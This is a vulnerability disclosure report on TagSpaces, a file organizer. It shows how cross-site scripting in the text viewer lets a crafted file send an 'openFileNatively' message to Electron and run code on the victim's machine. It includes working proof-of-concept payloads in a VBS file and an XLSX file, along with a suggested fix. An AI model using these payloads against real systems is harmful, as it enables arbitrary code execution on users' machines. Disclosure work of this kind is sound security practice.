Unprotected Alternate Channel in tagspaces/tagspaces

Reported on May 18th 2021


Code Execution using Reflected Cross Site Scripting

✍️ Description

Tagspaces is a file organizer that also works as a file manager. When you open a file, it tries to provide a preview of common files like images, code and text files. But if the extension is not known to tagspaces, it tries to load it in its text viewer which is vulnerable to cross site scripting. Now exploiting the cross site scripting vulnerability in the viewer text, it is possible to send a message back to the electron to open any file natively. By opening any executable file, we can execute code on the victim's machine.

🕵️‍♂️ Proof of Concept

Create a vbs file with the following content:

MsgBox "VBS code executed."

'<script>window.parent.postMessage(JSON.stringify({ command: 'openFileNatively', link: filePath }, '*'));</script>

Click on the file to see a preview, code gets executed: poc

💥 Impact

Using this vulnerability, an attacker can run arbitrary code on victim's machine. The vulnerability is not limited to VBS. We can also use common file extensions like XLSX and many more to execute code hidden within the same extension or open another executable file:

Create an XLSX file with following content:

payload = filePath.split('\\'); payload.pop(-1); payload.push('payload.vbs');
window.parent.postMessage(JSON.stringify({ command: 'openFileNatively', link: payload.join("/") }, '*'));

When you try to preview this file in tagspaces, It will open payload.vbs file residing along with our xlsx file.


The code within textViewer repository is vulnerable to XSS. But even if the XSS is fixed over there, any other XSS can result in code execution again. To fix this, try to confirm whether user wants to open file natively. See: https://github.com/tagspaces/tagspaces/blob/507ede585b5b6d3dcebf8d9f95bbdc8a5ef18bf3/app/components/EntryContainer.tsx#L337